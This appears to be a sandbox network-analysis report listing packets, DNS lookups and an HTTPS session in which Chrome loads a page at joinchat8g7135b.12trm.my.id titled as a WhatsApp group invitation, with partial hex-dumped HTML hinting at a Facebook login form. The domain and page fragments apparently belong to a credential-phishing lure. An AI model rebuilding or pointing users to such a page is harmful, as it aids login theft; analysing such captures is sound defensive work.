                          May 28, 2024 00:31:16.710725069 CEST63838443192.168.2.435.190.80.1
                          May 28, 2024 00:31:16.710737944 CEST4436383835.190.80.1192.168.2.4
                          May 28, 2024 00:31:16.710799932 CEST4436383835.190.80.1192.168.2.4
                          May 28, 2024 00:31:16.733191967 CEST4436383935.190.80.1192.168.2.4
                          May 28, 2024 00:31:16.733455896 CEST63839443192.168.2.435.190.80.1
                          May 28, 2024 00:31:16.733463049 CEST4436383935.190.80.1192.168.2.4
                          May 28, 2024 00:31:16.734610081 CEST4436383935.190.80.1192.168.2.4
                          May 28, 2024 00:31:16.735022068 CEST63839443192.168.2.435.190.80.1
                          May 28, 2024 00:31:16.735064030 CEST63839443192.168.2.435.190.80.1
                          May 28, 2024 00:31:16.735191107 CEST4436383935.190.80.1192.168.2.4
                          May 28, 2024 00:31:16.764714956 CEST63838443192.168.2.435.190.80.1
                          May 28, 2024 00:31:16.777168036 CEST63839443192.168.2.435.190.80.1
                          May 28, 2024 00:31:16.866147995 CEST4436383835.190.80.1192.168.2.4
                          May 28, 2024 00:31:16.866254091 CEST4436383835.190.80.1192.168.2.4
                          May 28, 2024 00:31:16.866523027 CEST63838443192.168.2.435.190.80.1
                          May 28, 2024 00:31:16.866530895 CEST4436383835.190.80.1192.168.2.4
                          May 28, 2024 00:31:16.866561890 CEST63838443192.168.2.435.190.80.1
                          May 28, 2024 00:31:16.866620064 CEST63838443192.168.2.435.190.80.1
                          May 28, 2024 00:31:16.867032051 CEST63840443192.168.2.435.190.80.1
                          May 28, 2024 00:31:16.867074966 CEST4436384035.190.80.1192.168.2.4
                          May 28, 2024 00:31:16.867321014 CEST63840443192.168.2.435.190.80.1
                          May 28, 2024 00:31:16.867358923 CEST63840443192.168.2.435.190.80.1
                          May 28, 2024 00:31:16.867366076 CEST4436384035.190.80.1192.168.2.4
                          May 28, 2024 00:31:16.868311882 CEST4436383935.190.80.1192.168.2.4
                          May 28, 2024 00:31:16.868511915 CEST4436383935.190.80.1192.168.2.4
                          May 28, 2024 00:31:16.868546963 CEST63839443192.168.2.435.190.80.1
                          May 28, 2024 00:31:16.868554115 CEST4436383935.190.80.1192.168.2.4
                          May 28, 2024 00:31:16.868623972 CEST63839443192.168.2.435.190.80.1
                          May 28, 2024 00:31:16.868623972 CEST63839443192.168.2.435.190.80.1
                          May 28, 2024 00:31:16.868895054 CEST63841443192.168.2.435.190.80.1
                          May 28, 2024 00:31:16.868905067 CEST4436384135.190.80.1192.168.2.4
                          May 28, 2024 00:31:16.869023085 CEST63841443192.168.2.435.190.80.1
                          May 28, 2024 00:31:16.869201899 CEST63841443192.168.2.435.190.80.1
                          May 28, 2024 00:31:16.869216919 CEST4436384135.190.80.1192.168.2.4
                          May 28, 2024 00:31:17.341941118 CEST4436384035.190.80.1192.168.2.4
                          May 28, 2024 00:31:17.342447996 CEST63840443192.168.2.435.190.80.1
                          May 28, 2024 00:31:17.342461109 CEST4436384035.190.80.1192.168.2.4
                          May 28, 2024 00:31:17.342955112 CEST4436384035.190.80.1192.168.2.4
                          May 28, 2024 00:31:17.343300104 CEST63840443192.168.2.435.190.80.1
                          May 28, 2024 00:31:17.343384027 CEST4436384035.190.80.1192.168.2.4
                          May 28, 2024 00:31:17.343405962 CEST63840443192.168.2.435.190.80.1
                          May 28, 2024 00:31:17.343405962 CEST63840443192.168.2.435.190.80.1
                          May 28, 2024 00:31:17.343430996 CEST4436384035.190.80.1192.168.2.4
                          May 28, 2024 00:31:17.357403994 CEST4436384135.190.80.1192.168.2.4
                          May 28, 2024 00:31:17.357608080 CEST63841443192.168.2.435.190.80.1
                          May 28, 2024 00:31:17.357618093 CEST4436384135.190.80.1192.168.2.4
                          May 28, 2024 00:31:17.358771086 CEST4436384135.190.80.1192.168.2.4
                          May 28, 2024 00:31:17.359110117 CEST63841443192.168.2.435.190.80.1
                          May 28, 2024 00:31:17.359204054 CEST63841443192.168.2.435.190.80.1
                          May 28, 2024 00:31:17.359209061 CEST4436384135.190.80.1192.168.2.4
                          May 28, 2024 00:31:17.359282970 CEST4436384135.190.80.1192.168.2.4
                          May 28, 2024 00:31:17.386185884 CEST63840443192.168.2.435.190.80.1
                          May 28, 2024 00:31:17.401809931 CEST63841443192.168.2.435.190.80.1
                          May 28, 2024 00:31:17.470942974 CEST4436384035.190.80.1192.168.2.4
                          May 28, 2024 00:31:17.471827984 CEST4436384035.190.80.1192.168.2.4
                          May 28, 2024 00:31:17.471914053 CEST63840443192.168.2.435.190.80.1
                          May 28, 2024 00:31:17.472491026 CEST63840443192.168.2.435.190.80.1
                          May 28, 2024 00:31:17.472503901 CEST4436384035.190.80.1192.168.2.4
                          May 28, 2024 00:31:17.493015051 CEST4436384135.190.80.1192.168.2.4
                          May 28, 2024 00:31:17.493087053 CEST4436384135.190.80.1192.168.2.4
                          May 28, 2024 00:31:17.493249893 CEST63841443192.168.2.435.190.80.1
                          May 28, 2024 00:31:17.493261099 CEST4436384135.190.80.1192.168.2.4
                          May 28, 2024 00:31:17.493274927 CEST63841443192.168.2.435.190.80.1
                          May 28, 2024 00:31:17.493304014 CEST63841443192.168.2.435.190.80.1
                          May 28, 2024 00:31:22.902273893 CEST4972380192.168.2.4173.222.108.226
                          May 28, 2024 00:31:22.907933950 CEST8049723173.222.108.226192.168.2.4
                          May 28, 2024 00:31:22.908006907 CEST4972380192.168.2.4173.222.108.226
                          May 28, 2024 00:31:25.549714088 CEST44363837142.250.184.196192.168.2.4
                          May 28, 2024 00:31:25.549789906 CEST44363837142.250.184.196192.168.2.4
                          May 28, 2024 00:31:25.549858093 CEST63837443192.168.2.4142.250.184.196
                          May 28, 2024 00:31:26.436836004 CEST63837443192.168.2.4142.250.184.196
                          May 28, 2024 00:31:26.436898947 CEST44363837142.250.184.196192.168.2.4
                          TimestampSource PortDest PortSource IPDest IP
                          May 28, 2024 00:30:10.235754013 CEST53638611.1.1.1192.168.2.4
                          May 28, 2024 00:30:10.246876001 CEST53646111.1.1.1192.168.2.4
                          May 28, 2024 00:30:11.267577887 CEST53500341.1.1.1192.168.2.4
                          May 28, 2024 00:30:11.931536913 CEST5531953192.168.2.41.1.1.1
                          May 28, 2024 00:30:11.931778908 CEST5999153192.168.2.41.1.1.1
                          May 28, 2024 00:30:11.942213058 CEST53599911.1.1.1192.168.2.4
                          May 28, 2024 00:30:11.948191881 CEST5479453192.168.2.41.1.1.1
                          May 28, 2024 00:30:11.948369980 CEST5331353192.168.2.41.1.1.1
                          May 28, 2024 00:30:11.958113909 CEST53547941.1.1.1192.168.2.4
                          May 28, 2024 00:30:11.960232973 CEST53533131.1.1.1192.168.2.4
                          May 28, 2024 00:30:12.571518898 CEST53553191.1.1.1192.168.2.4
                          May 28, 2024 00:30:13.340240955 CEST6357353192.168.2.41.1.1.1
                          May 28, 2024 00:30:13.340451002 CEST5686353192.168.2.41.1.1.1
                          May 28, 2024 00:30:13.340795040 CEST5160053192.168.2.41.1.1.1
                          May 28, 2024 00:30:13.340977907 CEST6088553192.168.2.41.1.1.1
                          May 28, 2024 00:30:13.349644899 CEST53635731.1.1.1192.168.2.4
                          May 28, 2024 00:30:13.349750042 CEST53568631.1.1.1192.168.2.4
                          May 28, 2024 00:30:13.351258039 CEST53608851.1.1.1192.168.2.4
                          May 28, 2024 00:30:13.351291895 CEST53629411.1.1.1192.168.2.4
                          May 28, 2024 00:30:14.280149937 CEST6465053192.168.2.41.1.1.1
                          May 28, 2024 00:30:14.280633926 CEST4991953192.168.2.41.1.1.1
                          May 28, 2024 00:30:14.290076971 CEST53646501.1.1.1192.168.2.4
                          May 28, 2024 00:30:14.330641985 CEST53496781.1.1.1192.168.2.4
                          May 28, 2024 00:30:14.633903027 CEST53499191.1.1.1192.168.2.4
                          May 28, 2024 00:30:14.918965101 CEST6488553192.168.2.41.1.1.1
                          May 28, 2024 00:30:14.919334888 CEST5191653192.168.2.41.1.1.1
                          May 28, 2024 00:30:14.927980900 CEST53648851.1.1.1192.168.2.4
                          May 28, 2024 00:30:14.928018093 CEST53519161.1.1.1192.168.2.4
                          May 28, 2024 00:30:15.046731949 CEST5661753192.168.2.41.1.1.1
                          May 28, 2024 00:30:15.048222065 CEST6345653192.168.2.41.1.1.1
                          May 28, 2024 00:30:15.074580908 CEST53634561.1.1.1192.168.2.4
                          May 28, 2024 00:30:15.081207991 CEST53566171.1.1.1192.168.2.4
                          May 28, 2024 00:30:15.100830078 CEST5733853192.168.2.41.1.1.1
                          May 28, 2024 00:30:15.101281881 CEST6135953192.168.2.41.1.1.1
                          May 28, 2024 00:30:15.102952003 CEST6062153192.168.2.41.1.1.1
                          May 28, 2024 00:30:15.107971907 CEST5117653192.168.2.41.1.1.1
                          May 28, 2024 00:30:15.108164072 CEST53573381.1.1.1192.168.2.4
                          May 28, 2024 00:30:15.110862017 CEST53613591.1.1.1192.168.2.4
                          May 28, 2024 00:30:15.120942116 CEST53606211.1.1.1192.168.2.4
                          May 28, 2024 00:30:15.124804020 CEST53511761.1.1.1192.168.2.4
                          May 28, 2024 00:30:16.185394049 CEST6386753192.168.2.41.1.1.1
                          May 28, 2024 00:30:16.185702085 CEST6069153192.168.2.41.1.1.1
                          May 28, 2024 00:30:16.192522049 CEST53638671.1.1.1192.168.2.4
                          May 28, 2024 00:30:16.193160057 CEST53606911.1.1.1192.168.2.4
                          May 28, 2024 00:30:16.207680941 CEST5347553192.168.2.41.1.1.1
                          May 28, 2024 00:30:16.207978010 CEST6458753192.168.2.41.1.1.1
                          May 28, 2024 00:30:16.214920044 CEST53645871.1.1.1192.168.2.4
                          May 28, 2024 00:30:16.216161013 CEST53534751.1.1.1192.168.2.4
                          May 28, 2024 00:30:16.733866930 CEST5994453192.168.2.41.1.1.1
                          May 28, 2024 00:30:16.734103918 CEST5278553192.168.2.41.1.1.1
                          May 28, 2024 00:30:16.751526117 CEST53599441.1.1.1192.168.2.4
                          May 28, 2024 00:30:16.751677990 CEST53527851.1.1.1192.168.2.4
                          May 28, 2024 00:30:17.270003080 CEST53642721.1.1.1192.168.2.4
                          May 28, 2024 00:30:17.526350021 CEST6309653192.168.2.41.1.1.1
                          May 28, 2024 00:30:17.526994944 CEST6365653192.168.2.41.1.1.1
                          May 28, 2024 00:30:17.639060974 CEST53630961.1.1.1192.168.2.4
                          May 28, 2024 00:30:17.734741926 CEST53636561.1.1.1192.168.2.4
                          May 28, 2024 00:30:30.022233009 CEST53627271.1.1.1192.168.2.4
                          May 28, 2024 00:30:34.487068892 CEST138138192.168.2.4192.168.2.255
                          May 28, 2024 00:30:48.738123894 CEST53607771.1.1.1192.168.2.4
                          May 28, 2024 00:30:53.788738966 CEST53644281.1.1.1192.168.2.4
                          May 28, 2024 00:31:09.771852970 CEST53542101.1.1.1192.168.2.4
                          TimestampSource IPDest IPChecksumCodeType
                          May 28, 2024 00:30:12.571630955 CEST192.168.2.41.1.1.1c211(Port unreachable)Destination Unreachable
                          May 28, 2024 00:30:14.634016037 CEST192.168.2.41.1.1.1c23a(Port unreachable)Destination Unreachable
                          May 28, 2024 00:30:17.737766027 CEST192.168.2.41.1.1.1c243(Port unreachable)Destination Unreachable
                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          May 28, 2024 00:30:11.931536913 CEST192.168.2.41.1.1.10x3483Standard query (0)joinchat8g7135b.12trm.my.idA (IP address)IN (0x0001)false
                          May 28, 2024 00:30:11.931778908 CEST192.168.2.41.1.1.10xe27aStandard query (0)joinchat8g7135b.12trm.my.id65IN (0x0001)false
                          May 28, 2024 00:30:11.948191881 CEST192.168.2.41.1.1.10x9b25Standard query (0)joinchat8g7135b.12trm.my.idA (IP address)IN (0x0001)false
                          May 28, 2024 00:30:11.948369980 CEST192.168.2.41.1.1.10xb970Standard query (0)joinchat8g7135b.12trm.my.id65IN (0x0001)false
                          May 28, 2024 00:30:13.340240955 CEST192.168.2.41.1.1.10x7003Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                          May 28, 2024 00:30:13.340451002 CEST192.168.2.41.1.1.10x9d07Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                          May 28, 2024 00:30:13.340795040 CEST192.168.2.41.1.1.10xe0c7Standard query (0)cdn.jsdelivr.netA (IP address)IN (0x0001)false
                          May 28, 2024 00:30:13.340977907 CEST192.168.2.41.1.1.10xdc2cStandard query (0)cdn.jsdelivr.net65IN (0x0001)false
                          May 28, 2024 00:30:14.280149937 CEST192.168.2.41.1.1.10x3a78Standard query (0)joinchat8g7135b.12trm.my.idA (IP address)IN (0x0001)false
                          May 28, 2024 00:30:14.280633926 CEST192.168.2.41.1.1.10x7755Standard query (0)joinchat8g7135b.12trm.my.id65IN (0x0001)false
                          May 28, 2024 00:30:14.918965101 CEST192.168.2.41.1.1.10x143aStandard query (0)www.google.comA (IP address)IN (0x0001)false
                          May 28, 2024 00:30:14.919334888 CEST192.168.2.41.1.1.10xe77bStandard query (0)www.google.com65IN (0x0001)false
                          May 28, 2024 00:30:15.046731949 CEST192.168.2.41.1.1.10xec50Standard query (0)www.starratings.com.auA (IP address)IN (0x0001)false
                          May 28, 2024 00:30:15.048222065 CEST192.168.2.41.1.1.10xf3f0Standard query (0)www.starratings.com.au65IN (0x0001)false
                          May 28, 2024 00:30:15.100830078 CEST192.168.2.41.1.1.10xafeaStandard query (0)rawcdn.githack.comA (IP address)IN (0x0001)false
                          May 28, 2024 00:30:15.101281881 CEST192.168.2.41.1.1.10x88aaStandard query (0)rawcdn.githack.com65IN (0x0001)false
                          May 28, 2024 00:30:15.102952003 CEST192.168.2.41.1.1.10x40dfStandard query (0)cloud.githubusercontent.comA (IP address)IN (0x0001)false
                          May 28, 2024 00:30:15.107971907 CEST192.168.2.41.1.1.10xe8fbStandard query (0)cloud.githubusercontent.com65IN (0x0001)false
                          May 28, 2024 00:30:16.185394049 CEST192.168.2.41.1.1.10x8c63Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                          May 28, 2024 00:30:16.185702085 CEST192.168.2.41.1.1.10xb3a2Standard query (0)raw.githubusercontent.com65IN (0x0001)false
                          May 28, 2024 00:30:16.207680941 CEST192.168.2.41.1.1.10x4c6cStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                          May 28, 2024 00:30:16.207978010 CEST192.168.2.41.1.1.10xbd6Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                          May 28, 2024 00:30:16.733866930 CEST192.168.2.41.1.1.10x4084Standard query (0)cloud.githubusercontent.comA (IP address)IN (0x0001)false
                          May 28, 2024 00:30:16.734103918 CEST192.168.2.41.1.1.10x148bStandard query (0)cloud.githubusercontent.com65IN (0x0001)false
                          May 28, 2024 00:30:17.526350021 CEST192.168.2.41.1.1.10xf66bStandard query (0)www.starratings.com.auA (IP address)IN (0x0001)false
                          May 28, 2024 00:30:17.526994944 CEST192.168.2.41.1.1.10x8abeStandard query (0)www.starratings.com.au65IN (0x0001)false
                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          May 28, 2024 00:30:11.942213058 CEST1.1.1.1192.168.2.40xe27aNo error (0)joinchat8g7135b.12trm.my.id65IN (0x0001)false
                          May 28, 2024 00:30:11.958113909 CEST1.1.1.1192.168.2.40x9b25No error (0)joinchat8g7135b.12trm.my.id188.114.96.3A (IP address)IN (0x0001)false
                          May 28, 2024 00:30:11.958113909 CEST1.1.1.1192.168.2.40x9b25No error (0)joinchat8g7135b.12trm.my.id188.114.97.3A (IP address)IN (0x0001)false
                          May 28, 2024 00:30:11.960232973 CEST1.1.1.1192.168.2.40xb970No error (0)joinchat8g7135b.12trm.my.id65IN (0x0001)false
                          May 28, 2024 00:30:12.571518898 CEST1.1.1.1192.168.2.40x3483No error (0)joinchat8g7135b.12trm.my.id188.114.97.3A (IP address)IN (0x0001)false
                          May 28, 2024 00:30:12.571518898 CEST1.1.1.1192.168.2.40x3483No error (0)joinchat8g7135b.12trm.my.id188.114.96.3A (IP address)IN (0x0001)false
                          May 28, 2024 00:30:13.349644899 CEST1.1.1.1192.168.2.40x7003No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                          May 28, 2024 00:30:13.349644899 CEST1.1.1.1192.168.2.40x7003No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                          May 28, 2024 00:30:13.349714994 CEST1.1.1.1192.168.2.40xe0c7No error (0)cdn.jsdelivr.netcdn.jsdelivr.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                          May 28, 2024 00:30:13.349750042 CEST1.1.1.1192.168.2.40x9d07No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                          May 28, 2024 00:30:13.351258039 CEST1.1.1.1192.168.2.40xdc2cNo error (0)cdn.jsdelivr.netcdn.jsdelivr.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                          May 28, 2024 00:30:14.290076971 CEST1.1.1.1192.168.2.40x3a78No error (0)joinchat8g7135b.12trm.my.id188.114.97.3A (IP address)IN (0x0001)false
                          May 28, 2024 00:30:14.290076971 CEST1.1.1.1192.168.2.40x3a78No error (0)joinchat8g7135b.12trm.my.id188.114.96.3A (IP address)IN (0x0001)false
                          May 28, 2024 00:30:14.633903027 CEST1.1.1.1192.168.2.40x7755No error (0)joinchat8g7135b.12trm.my.id65IN (0x0001)false
                          May 28, 2024 00:30:14.927980900 CEST1.1.1.1192.168.2.40x143aNo error (0)www.google.com142.250.184.196A (IP address)IN (0x0001)false
                          May 28, 2024 00:30:14.928018093 CEST1.1.1.1192.168.2.40xe77bNo error (0)www.google.com65IN (0x0001)false
                          May 28, 2024 00:30:15.081207991 CEST1.1.1.1192.168.2.40xec50No error (0)www.starratings.com.au54.252.28.172A (IP address)IN (0x0001)false
                          May 28, 2024 00:30:15.108164072 CEST1.1.1.1192.168.2.40xafeaNo error (0)rawcdn.githack.com104.21.234.230A (IP address)IN (0x0001)false
                          May 28, 2024 00:30:15.108164072 CEST1.1.1.1192.168.2.40xafeaNo error (0)rawcdn.githack.com104.21.234.231A (IP address)IN (0x0001)false
                          May 28, 2024 00:30:15.110862017 CEST1.1.1.1192.168.2.40x88aaNo error (0)rawcdn.githack.com65IN (0x0001)false
                          May 28, 2024 00:30:15.120942116 CEST1.1.1.1192.168.2.40x40dfNo error (0)cloud.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                          May 28, 2024 00:30:15.120942116 CEST1.1.1.1192.168.2.40x40dfNo error (0)cloud.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                          May 28, 2024 00:30:15.120942116 CEST1.1.1.1192.168.2.40x40dfNo error (0)cloud.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                          May 28, 2024 00:30:15.120942116 CEST1.1.1.1192.168.2.40x40dfNo error (0)cloud.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                          May 28, 2024 00:30:16.192522049 CEST1.1.1.1192.168.2.40x8c63No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                          May 28, 2024 00:30:16.192522049 CEST1.1.1.1192.168.2.40x8c63No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                          May 28, 2024 00:30:16.192522049 CEST1.1.1.1192.168.2.40x8c63No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                          May 28, 2024 00:30:16.192522049 CEST1.1.1.1192.168.2.40x8c63No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                          May 28, 2024 00:30:16.216161013 CEST1.1.1.1192.168.2.40x4c6cNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                          May 28, 2024 00:30:16.751526117 CEST1.1.1.1192.168.2.40x4084No error (0)cloud.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                          May 28, 2024 00:30:16.751526117 CEST1.1.1.1192.168.2.40x4084No error (0)cloud.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                          May 28, 2024 00:30:16.751526117 CEST1.1.1.1192.168.2.40x4084No error (0)cloud.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                          May 28, 2024 00:30:16.751526117 CEST1.1.1.1192.168.2.40x4084No error (0)cloud.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                          May 28, 2024 00:30:17.639060974 CEST1.1.1.1192.168.2.40xf66bNo error (0)www.starratings.com.au54.252.28.172A (IP address)IN (0x0001)false
                          May 28, 2024 00:30:27.318162918 CEST1.1.1.1192.168.2.40x7f97No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                          May 28, 2024 00:30:27.318162918 CEST1.1.1.1192.168.2.40x7f97No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                          May 28, 2024 00:30:27.881211996 CEST1.1.1.1192.168.2.40xdfbeNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                          May 28, 2024 00:30:27.881211996 CEST1.1.1.1192.168.2.40xdfbeNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                          May 28, 2024 00:30:41.052256107 CEST1.1.1.1192.168.2.40x1148No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                          May 28, 2024 00:30:41.052256107 CEST1.1.1.1192.168.2.40x1148No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                          May 28, 2024 00:31:36.357963085 CEST1.1.1.1192.168.2.40x5d4cNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                          May 28, 2024 00:31:36.357963085 CEST1.1.1.1192.168.2.40x5d4cNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                          • joinchat8g7135b.12trm.my.id
                          • https:
                            • cdnjs.cloudflare.com
                            • rawcdn.githack.com
                            • cloud.githubusercontent.com
                            • www.starratings.com.au
                            • raw.githubusercontent.com
                          • fs.microsoft.com
                          • a.nel.cloudflare.com
                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.449735188.114.96.34435308C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-27 22:30:12 UTC685OUTGET /vhsfhqpdhdsih6/ HTTP/1.1
                          Host: joinchat8g7135b.12trm.my.id
                          Connection: keep-alive
                          Upgrade-Insecure-Requests: 1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Sec-Fetch-Site: none
                          Sec-Fetch-Mode: navigate
                          Sec-Fetch-User: ?1
                          Sec-Fetch-Dest: document
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          sec-ch-ua-platform: "Windows"
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-27 22:30:13 UTC596INHTTP/1.1 200 OK
                          Date: Mon, 27 May 2024 22:30:13 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e0U5fkPX6yLebBgB4dGIi%2FcT10E2n%2BpxBEcO4YT%2Boh2tBa1vEYITuU1DPm%2FqIyqGZ%2FcmWBWxVURz2YAIpO5HaPQAjEqrYTR6EVxzF7G0uu0b3ycfCzjXj4BwMoK4xjAXWYjkLEGlx49a25Mc%2Fdc%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 88a972b84bf417bd-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-05-27 22:30:13 UTC773INData Raw: 33 37 62 65 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 3c 68 74 6d 6c 20 74 72 61 6e 73 6c 61 74 65 3d 22 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 55 6e 64 61 6e 67 61 6e 20 47 72 75 70 20 57 68 61 74 73 41 70 70 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d
                          Data Ascii: 37be<html lang="en"><head><html translate="no"> <meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>Undangan Grup WhatsApp</title><meta name="viewport" content="width=
                          2024-05-27 22:30:13 UTC1369INData Raw: 73 41 70 70 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 73 74 61 74 75 73 2d 62 61 72 2d 73 74 79 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 23 30 30 35 65 35 34 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 63 61 70 61 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 79 65 73 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 69 6d 67 2f 6c 6f 67 6f 77 61 2e 70 6e 67 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74
                          Data Ascii: sApp"><meta name="apple-mobile-web-app-status-bar-style" content="#005e54"><meta name="mobile-web-app-capable" content="yes"><meta name="robots" content="noindex"><link rel="apple-touch-icon" type="image/png" href="img/logowa.png"><link rel="shortcut
                          2024-05-27 22:30:13 UTC1369INData Raw: 63 6f 6c 6f 72 3a 23 66 66 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 33 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 7d 0a 2e 63 6f 6e 74 65 6e 74 2d 62 6f 78 2d 66 62 20 69 6d 67 20 7b 0a 20 20 20 20 77 69 64 74 68 3a 20 36 30 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 30 70 78 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 32 70 78 3b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 7d 0a 2e 74 78 74 2d 6c 6f 67 69 6e 2d 66 62 20 7b 0a 20 20 20 20 77 69 64 74 68 3a 20 32 39 30 70 78 3b 0a 20 20 20 20 68 65
                          Data Ascii: color:#fff; font-size: 13px; font-family: 'Roboto';}.content-box-fb img { width: 60; margin-top: 20px; margin-left: auto; margin-right: auto; border-radius: 12px; display: block;}.txt-login-fb { width: 290px; he
